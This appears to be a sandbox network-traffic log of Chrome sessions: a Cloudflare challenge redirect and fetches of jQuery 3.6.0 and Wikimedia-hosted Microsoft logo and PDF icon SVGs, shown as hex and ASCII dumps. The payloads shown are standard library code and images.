                                    Cookie: PUUsBzGtrExYDELzTBIyQY5GqxU=If0sh8Z41RsBcCvWYu6ip129qDo; lPzTpaGcxz9WhRcz-77ydUSDnto=1732745200; -q9GqergfbWghlAaztMDrMKaTWU=1732831600; rUVWbTk16-Yzd9-_0riynkgIRs8=tK8LKZcaf7n1Hd91px_j-FDkQ78; 1KpNbQKJGux7dgx29IJNBjIsBcw=j6yULiTE1iXXHUVNwDs_ThwPui0; FK4RvuSBOVTnuo09Im3NRtX9n4o=1732745201; IX4QICePcnmPJIwpdGdqlzIvQ2Y=1732831601; eVlrdrGpRDoH3l-8I0OChIXmYy4=-EegDvlSeQ2-GGIA46Zm_V3ReKY
                                    2024-11-27 22:06:50 UTC919INHTTP/1.1 302 Found
                                    Date: Wed, 27 Nov 2024 22:06:50 GMT
                                    Content-Length: 0
                                    Connection: close
                                    location: /cdn-cgi/challenge-platform/h/b/scripts/jsd/a6e12e96a2d5/main.js?
                                    cache-control: max-age=300, stale-if-error=10800, stale-while-revalidate=10800, public
                                    access-control-allow-origin: *
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aIqlt4R4EBdH8iEfAqquLuNB4MKYmEYRnTzUMH%2BFJG%2BYkUOIvVmIgYYlQ5IBh0akJ4i3NZdnotWOi5wHqrc9eqvQyT8p0aETh%2F8%2FpXnuVmzk7MvvsFghmzuPqofY0pT%2FZQgy7rak"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 8e956d7d8d417c7b-EWR
                                    alt-svc: h3=":443"; ma=86400
                                    server-timing: cfL4;desc="?proto=TCP&rtt=1820&min_rtt=1816&rtt_var=689&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=1504&delivery_rate=1578378&cwnd=207&unsent_bytes=0&cid=e045a0045fb7b387&ts=462&x=0"


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    13192.168.2.1649726151.101.2.1374437148C:\Program Files\Google\Chrome\Application\chrome.exe
                                    TimestampBytes transferredDirectionData
                                    2024-11-27 22:06:51 UTC358OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                    Host: code.jquery.com
                                    Connection: keep-alive
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                    Accept: */*
                                    Sec-Fetch-Site: none
                                    Sec-Fetch-Mode: cors
                                    Sec-Fetch-Dest: empty
                                    Accept-Encoding: gzip, deflate, br
                                    Accept-Language: en-US,en;q=0.9
                                    2024-11-27 22:06:53 UTC611INHTTP/1.1 200 OK
                                    Connection: close
                                    Content-Length: 89501
                                    Server: nginx
                                    Content-Type: application/javascript; charset=utf-8
                                    Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                    ETag: "28feccc0-15d9d"
                                    Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                    Access-Control-Allow-Origin: *
                                    Cross-Origin-Resource-Policy: cross-origin
                                    Via: 1.1 varnish, 1.1 varnish
                                    Accept-Ranges: bytes
                                    Age: 2727288
                                    Date: Wed, 27 Nov 2024 22:06:53 GMT
                                    X-Served-By: cache-lga21931-LGA, cache-nyc-kteb1890061-NYC
                                    X-Cache: HIT, HIT
                                    X-Cache-Hits: 55, 0
                                    X-Timer: S1732745213.060157,VS0,VE1
                                    Vary: Accept-Encoding
                                    2024-11-27 22:06:53 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                    Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                    2024-11-27 22:06:53 UTC1378INData Raw: 7d 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 73 2e 63 61 6c 6c 28 74 68 69 73 29 3a 65 3c 30 3f 74 68 69 73 5b 65 2b 74 68 69 73 2e 6c 65 6e 67 74 68 5d 3a 74 68 69 73 5b 65 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 53 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 65 29 3b 72 65 74 75 72 6e 20 74 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 74 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 53 2e 65 61 63 68 28 74 68 69 73 2c 65 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 53 2e 6d 61 70 28 74 68 69 73 2c 66
                                    Data Ascii: },get:function(e){return null==e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=S.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return S.each(this,e)},map:function(n){return this.pushStack(S.map(this,f
                                    2024-11-27 22:06:53 UTC1378INData Raw: 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3b 72 65 74 75 72 6e 21 28 21 65 7c 7c 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 3d 6f 2e 63 61 6c 6c 28 65 29 29 26 26 28 21 28 74 3d 72 28 65 29 29 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 28 6e 3d 76 2e 63 61 6c 6c 28 74 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 29 26 26 61 2e 63 61 6c 6c 28 6e 29 3d 3d 3d 6c 29 7d 2c 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 66 6f 72 28 74 20 69 6e 20 65 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 67 6c 6f 62 61 6c 45 76 61 6c 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 62 28 65 2c 7b 6e 6f 6e 63 65 3a 74 26 26 74 2e 6e 6f
                                    Data Ascii: on(e){var t,n;return!(!e||"[object Object]"!==o.call(e))&&(!(t=r(e))||"function"==typeof(n=v.call(t,"constructor")&&t.constructor)&&a.call(n)===l)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){b(e,{nonce:t&&t.no
                                    2024-11-27 22:06:53 UTC1378INData Raw: 5d 2c 71 3d 74 2e 70 6f 70 2c 4c 3d 74 2e 70 75 73 68 2c 48 3d 74 2e 70 75 73 68 2c 4f 3d 74 2e 73 6c 69 63 65 2c 50 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 2c 72 3d 65 2e 6c 65 6e 67 74 68 3b 6e 3c 72 3b 6e 2b 2b 29 69 66 28 65 5b 6e 5d 3d 3d 3d 74 29 72 65 74 75 72 6e 20 6e 3b 72 65 74 75 72 6e 2d 31 7d 2c 52 3d 22 63 68 65 63 6b 65 64 7c 73 65 6c 65 63 74 65 64 7c 61 73 79 6e 63 7c 61 75 74 6f 66 6f 63 75 73 7c 61 75 74 6f 70 6c 61 79 7c 63 6f 6e 74 72 6f 6c 73 7c 64 65 66 65 72 7c 64 69 73 61 62 6c 65 64 7c 68 69 64 64 65 6e 7c 69 73 6d 61 70 7c 6c 6f 6f 70 7c 6d 75 6c 74 69 70 6c 65 7c 6f 70 65 6e 7c 72 65 61 64 6f 6e 6c 79 7c 72 65 71 75 69 72 65 64 7c 73 63 6f 70 65 64 22 2c 4d 3d 22 5b 5c 5c 78 32 30 5c 5c 74
                                    Data Ascii: ],q=t.pop,L=t.push,H=t.push,O=t.slice,P=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},R="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",M="[\\x20\\t
                                    2024-11-27 22:06:53 UTC1378INData Raw: 2c 65 65 3d 2f 5b 2b 7e 5d 2f 2c 74 65 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 5c 5c 5b 5c 5c 64 61 2d 66 41 2d 46 5d 7b 31 2c 36 7d 22 2b 4d 2b 22 3f 7c 5c 5c 5c 5c 28 5b 5e 5c 5c 72 5c 5c 6e 5c 5c 66 5d 29 22 2c 22 67 22 29 2c 6e 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 30 78 22 2b 65 2e 73 6c 69 63 65 28 31 29 2d 36 35 35 33 36 3b 72 65 74 75 72 6e 20 74 7c 7c 28 6e 3c 30 3f 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 2b 36 35 35 33 36 29 3a 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 3e 3e 31 30 7c 35 35 32 39 36 2c 31 30 32 33 26 6e 7c 35 36 33 32 30 29 29 7d 2c 72 65 3d 2f 28 5b 5c 30 2d 5c 78 31 66 5c 78 37 66 5d 7c 5e 2d 3f 5c 64 29 7c 5e 2d 24 7c 5b 5e 5c 30 2d 5c 78 31 66 5c
                                    Data Ascii: ,ee=/[+~]/,te=new RegExp("\\\\[\\da-fA-F]{1,6}"+M+"?|\\\\([^\\r\\n\\f])","g"),ne=function(e,t){var n="0x"+e.slice(1)-65536;return t||(n<0?String.fromCharCode(n+65536):String.fromCharCode(n>>10|55296,1023&n|56320))},re=/([\0-\x1f\x7f]|^-?\d)|^-$|[^\0-\x1f\
                                    2024-11-27 22:06:53 UTC1378INData Raw: 29 29 7b 28 66 3d 65 65 2e 74 65 73 74 28 74 29 26 26 79 65 28 65 2e 70 61 72 65 6e 74 4e 6f 64 65 29 7c 7c 65 29 3d 3d 3d 65 26 26 64 2e 73 63 6f 70 65 7c 7c 28 28 73 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 29 3f 73 3d 73 2e 72 65 70 6c 61 63 65 28 72 65 2c 69 65 29 3a 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 2c 73 3d 53 29 29 2c 6f 3d 28 6c 3d 68 28 74 29 29 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 6f 2d 2d 29 6c 5b 6f 5d 3d 28 73 3f 22 23 22 2b 73 3a 22 3a 73 63 6f 70 65 22 29 2b 22 20 22 2b 78 65 28 6c 5b 6f 5d 29 3b 63 3d 6c 2e 6a 6f 69 6e 28 22 2c 22 29 7d 74 72 79 7b 72 65 74 75 72 6e 20 48 2e 61 70 70 6c 79 28 6e 2c 66 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 63 29 29 2c 6e 7d 63 61 74 63 68 28
                                    Data Ascii: )){(f=ee.test(t)&&ye(e.parentNode)||e)===e&&d.scope||((s=e.getAttribute("id"))?s=s.replace(re,ie):e.setAttribute("id",s=S)),o=(l=h(t)).length;while(o--)l[o]=(s?"#"+s:":scope")+" "+xe(l[o]);c=l.join(",")}try{return H.apply(n,f.querySelectorAll(c)),n}catch(
                                    2024-11-27 22:06:53 UTC1378INData Raw: 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 61 28 5b 5d 2c 65 2e 6c 65 6e 67 74 68 2c 6f 29 2c 69 3d 72 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 69 2d 2d 29 65 5b 6e 3d 72 5b 69 5d 5d 26 26 28 65 5b 6e 5d 3d 21 28 74 5b 6e 5d 3d 65 5b 6e 5d 29 29 7d 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 79 65 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 26 26 65 7d 66 6f 72 28 65 20 69 6e 20 64 3d 73 65 2e 73 75 70 70 6f 72 74 3d 7b 7d 2c 69 3d 73 65 2e 69 73 58 4d 4c 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 26 26 65 2e 6e 61 6d 65 73 70 61 63 65 55 52 49 2c 6e 3d 65 26 26 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c
                                    Data Ascii: ion(e,t){var n,r=a([],e.length,o),i=r.length;while(i--)e[n=r[i]]&&(e[n]=!(t[n]=e[n]))})})}function ye(e){return e&&"undefined"!=typeof e.getElementsByTagName&&e}for(e in d=se.support={},i=se.isXML=function(e){var t=e&&e.namespaceURI,n=e&&(e.ownerDocument|
                                    2024-11-27 22:06:53 UTC1378INData Raw: 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 65 2e 72 65 70 6c 61 63 65 28 74 65 2c 6e 65 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 26 26 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 3b 72 65 74 75 72 6e 20 74 26 26 74 2e 76 61 6c 75 65 3d 3d 3d 6e 7d 7d 2c 62 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 45 29 7b 76 61 72 20 6e 2c 72 2c 69 2c 6f 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 3b 69 66 28 6f 29 7b 69 66 28 28
                                    Data Ascii: tion(e){var n=e.replace(te,ne);return function(e){var t="undefined"!=typeof e.getAttributeNode&&e.getAttributeNode("id");return t&&t.value===n}},b.find.ID=function(e,t){if("undefined"!=typeof t.getElementById&&E){var n,r,i,o=t.getElementById(e);if(o){if((
                                    2024-11-27 22:06:53 UTC1378INData Raw: 5b 22 2b 4d 2b 22 2a 6e 61 6d 65 22 2b 4d 2b 22 2a 3d 22 2b 4d 2b 22 2a 28 3f 3a 27 27 7c 5c 22 5c 22 29 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 53 2b 22 2b 2a 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 2e 23 2e 2b 5b 2b 7e 5d 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5c 5c 5c 66 22 29 2c 76 2e 70 75 73 68 28 22 5b 5c 5c 72 5c 5c 6e 5c 5c 66 5d 22 29 7d 29 2c 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 3c 61 20 68 72 65 66 3d 27 27 20 64 69 73 61 62 6c 65 64 3d 27
                                    Data Ascii: ["+M+"*name"+M+"*="+M+"*(?:''|\"\")"),e.querySelectorAll(":checked").length||v.push(":checked"),e.querySelectorAll("a#"+S+"+*").length||v.push(".#.+[+~]"),e.querySelectorAll("\\\f"),v.push("[\\r\\n\\f]")}),ce(function(e){e.innerHTML="<a href='' disabled='
                                    2024-11-27 22:06:53 UTC1378INData Raw: 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 2d 21 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 3b 72 65 74 75 72 6e 20 6e 7c 7c 28 31 26 28 6e 3d 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 3d 3d 28 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 74 29 3f 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 74 29 3a 31 29 7c 7c 21 64 2e 73 6f 72 74 44 65 74 61 63 68 65 64 26 26 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 65 29 3d 3d 3d 6e 3f 65 3d 3d 43 7c 7c 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70 26 26 79 28 70 2c 65 29 3f 2d 31 3a 74 3d 3d 43 7c 7c 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70
                                    Data Ascii: e.compareDocumentPosition-!t.compareDocumentPosition;return n||(1&(n=(e.ownerDocument||e)==(t.ownerDocument||t)?e.compareDocumentPosition(t):1)||!d.sortDetached&&t.compareDocumentPosition(e)===n?e==C||e.ownerDocument==p&&y(p,e)?-1:t==C||t.ownerDocument==p


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    14192.168.2.1649730185.15.58.2404437148C:\Program Files\Google\Chrome\Application\chrome.exe
                                    TimestampBytes transferredDirectionData
                                    2024-11-27 22:06:51 UTC385OUTGET /wikipedia/commons/4/44/Microsoft_logo.svg HTTP/1.1
                                    Host: upload.wikimedia.org
                                    Connection: keep-alive
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                    Accept: */*
                                    Sec-Fetch-Site: none
                                    Sec-Fetch-Mode: cors
                                    Sec-Fetch-Dest: empty
                                    Accept-Encoding: gzip, deflate, br
                                    Accept-Language: en-US,en;q=0.9
                                    2024-11-27 22:06:52 UTC1080INHTTP/1.1 200 OK
                                    date: Wed, 27 Nov 2024 00:18:32 GMT
                                    server: ATS/9.2.6
                                    etag: W/363fdd53d34303b727d9dab161b8e88b
                                    content-type: image/svg+xml
                                    x-object-meta-sha1base36: an1udxuweqh76ugogpdy8qhw9zzoroi
                                    last-modified: Thu, 29 Jul 2021 02:10:50 GMT
                                    vary: Accept-Encoding
                                    age: 78499
                                    x-cache: cp6001 hit, cp6003 hit/211
                                    x-cache-status: hit-front
                                    server-timing: cache;desc="hit-front", host;desc="cp6003"
                                    strict-transport-security: max-age=106384710; includeSubDomains; preload
                                    report-to: { "group": "wm_nel", "max_age": 604800, "endpoints": [{ "url": "https://intake-logging.wikimedia.org/v1/events?stream=w3c.reportingapi.network_error&schema_uri=/w3c/reportingapi/network_error/1.0.0" }] }
                                    nel: { "report_to": "wm_nel", "max_age": 604800, "failure_fraction": 0.05, "success_fraction": 0.0}
                                    x-client-ip: 8.46.123.228
                                    x-content-type-options: nosniff
                                    access-control-allow-origin: *
                                    access-control-expose-headers: Age, Date, Content-Length, Content-Range, X-Content-Duration, X-Cache
                                    timing-allow-origin: *
                                    accept-ranges: bytes
                                    content-length: 272
                                    connection: close
                                    2024-11-27 22:06:52 UTC272INData Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 33 20 32 33 22 3e 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 66 33 66 33 66 33 22 20 64 3d 22 4d 30 20 30 68 32 33 76 32 33 48 30 7a 22 2f 3e 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 66 33 35 33 32 35 22 20 64 3d 22 4d 31 20 31 68 31 30 76 31 30 48 31 7a 22 2f 3e 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 38 31 62 63 30 36 22 20 64 3d 22 4d 31 32 20 31 68 31 30 76 31 30 48 31 32 7a 22 2f 3e 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 30 35 61 36 66 30 22 20 64 3d 22 4d 31 20 31 32 68 31 30 76 31 30 48 31 7a 22 2f 3e 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 66 66 62 61 30 38 22 20 64 3d 22 4d 31 32 20 31 32 68 31
                                    Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 23 23"><path fill="#f3f3f3" d="M0 0h23v23H0z"/><path fill="#f35325" d="M1 1h10v10H1z"/><path fill="#81bc06" d="M12 1h10v10H12z"/><path fill="#05a6f0" d="M1 12h10v10H1z"/><path fill="#ffba08" d="M12 12h1


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    15192.168.2.1649728185.15.58.2404437148C:\Program Files\Google\Chrome\Application\chrome.exe
                                    TimestampBytes transferredDirectionData
                                    2024-11-27 22:06:51 UTC584OUTGET /wikipedia/commons/8/87/PDF_file_icon.svg HTTP/1.1
                                    Host: upload.wikimedia.org
                                    Connection: keep-alive
                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                    sec-ch-ua-mobile: ?0
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                    sec-ch-ua-platform: "Windows"
                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                    Sec-Fetch-Site: cross-site
                                    Sec-Fetch-Mode: no-cors
                                    Sec-Fetch-Dest: image
                                    Accept-Encoding: gzip, deflate, br
                                    Accept-Language: en-US,en;q=0.9
                                    2024-11-27 22:06:52 UTC1081INHTTP/1.1 200 OK
                                    date: Tue, 26 Nov 2024 23:41:05 GMT
                                    server: ATS/9.2.6
                                    etag: W/a8feaf8ea80c17228a67dfeb1e251d8f
                                    content-type: image/svg+xml
                                    x-object-meta-sha1base36: 6m6viw83q9g48berxblqjamcmy7nocl
                                    last-modified: Tue, 02 Aug 2022 23:58:51 GMT
                                    vary: Accept-Encoding
                                    age: 80746
                                    x-cache: cp6007 hit, cp6003 hit/302
                                    x-cache-status: hit-front
                                    server-timing: cache;desc="hit-front", host;desc="cp6003"
                                    strict-transport-security: max-age=106384710; includeSubDomains; preload
                                    report-to: { "group": "wm_nel", "max_age": 604800, "endpoints": [{ "url": "https://intake-logging.wikimedia.org/v1/events?stream=w3c.reportingapi.network_error&schema_uri=/w3c/reportingapi/network_error/1.0.0" }] }
                                    nel: { "report_to": "wm_nel", "max_age": 604800, "failure_fraction": 0.05, "success_fraction": 0.0}
                                    x-client-ip: 8.46.123.228
                                    x-content-type-options: nosniff
                                    access-control-allow-origin: *
                                    access-control-expose-headers: Age, Date, Content-Length, Content-Range, X-Content-Duration, X-Cache
                                    timing-allow-origin: *
                                    accept-ranges: bytes
                                    content-length: 5094
                                    connection: close
                                    2024-11-27 22:06:52 UTC5094INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 20 73 74 61 6e 64 61 6c 6f 6e 65 3d 22 6e 6f 22 3f 3e 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 37 35 2e 33 32 30 31 32 39 6d 6d 22 20 68 65 69 67 68 74 3d 22 39 32 2e 36 30 34 31 36 34 6d 6d 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 37 35 2e 33 32 30 31 32 39 20 39 32 2e 36 30 34 31 36 34 22 3e 0a 20 20 3c 67 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 35 33 2e 35 34 38 30 35 37 20 2d 31 38 33 2e 39 37 35 32 37 36 29 20 73 63 61 6c 65 28 31 2e 34 38 34 33 29 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 66 66
                                    Data Ascii: <?xml version="1.0" encoding="UTF-8" standalone="no"?><svg xmlns="http://www.w3.org/2000/svg" width="75.320129mm" height="92.604164mm" viewBox="0 0 75.320129 92.604164"> <g transform="translate(53.548057 -183.975276) scale(1.4843)"> <path fill="#ff


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    16192.168.2.1649731185.15.58.2404437148C:\Program Files\Google\Chrome\Application\chrome.exe
                                    TimestampBytes transferredDirectionData
                                    2024-11-27 22:06:53 UTC384OUTGET /wikipedia/commons/8/87/PDF_file_icon.svg HTTP/1.1
                                    Host: upload.wikimedia.org
                                    Connection: keep-alive
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                    Accept: */*
                                    Sec-Fetch-Site: none
                                    Sec-Fetch-Mode: cors
                                    Sec-Fetch-Dest: empty
                                    Accept-Encoding: gzip, deflate, br
                                    Accept-Language: en-US,en;q=0.9
                                    2024-11-27 22:06:54 UTC1081INHTTP/1.1 200 OK
                                    date: Tue, 26 Nov 2024 23:41:05 GMT
                                    server: ATS/9.2.6
                                    etag: W/a8feaf8ea80c17228a67dfeb1e251d8f
                                    content-type: image/svg+xml
                                    x-object-meta-sha1base36: 6m6viw83q9g48berxblqjamcmy7nocl
                                    last-modified: Tue, 02 Aug 2022 23:58:51 GMT
                                    vary: Accept-Encoding
                                    age: 80748
                                    x-cache: cp6007 hit, cp6003 hit/303
                                    x-cache-status: hit-front
                                    server-timing: cache;desc="hit-front", host;desc="cp6003"
                                    strict-transport-security: max-age=106384710; includeSubDomains; preload
                                    report-to: { "group": "wm_nel", "max_age": 604800, "endpoints": [{ "url": "https://intake-logging.wikimedia.org/v1/events?stream=w3c.reportingapi.network_error&schema_uri=/w3c/reportingapi/network_error/1.0.0" }] }
                                    nel: { "report_to": "wm_nel", "max_age": 604800, "failure_fraction": 0.05, "success_fraction": 0.0}
                                    x-client-ip: 8.46.123.228
                                    x-content-type-options: nosniff
                                    access-control-allow-origin: *
                                    access-control-expose-headers: Age, Date, Content-Length, Content-Range, X-Content-Duration, X-Cache
                                    timing-allow-origin: *
                                    accept-ranges: bytes
                                    content-length: 5094
                                    connection: close
                                    2024-11-27 22:06:54 UTC5094INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 20 73 74 61 6e 64 61 6c 6f 6e 65 3d 22 6e 6f 22 3f 3e 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 37 35 2e 33 32 30 31 32 39 6d 6d 22 20 68 65 69 67 68 74 3d 22 39 32 2e 36 30 34 31 36 34 6d 6d 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 37 35 2e 33 32 30 31 32 39 20 39 32 2e 36 30 34 31 36 34 22 3e 0a 20 20 3c 67 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 35 33 2e 35 34 38 30 35 37 20 2d 31 38 33 2e 39 37 35 32 37 36 29 20 73 63 61 6c 65 28 31 2e 34 38 34 33 29 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 66 66
                                    Data Ascii: <?xml version="1.0" encoding="UTF-8" standalone="no"?><svg xmlns="http://www.w3.org/2000/svg" width="75.320129mm" height="92.604164mm" viewBox="0 0 75.320129 92.604164"> <g transform="translate(53.548057 -183.975276) scale(1.4843)"> <path fill="#ff


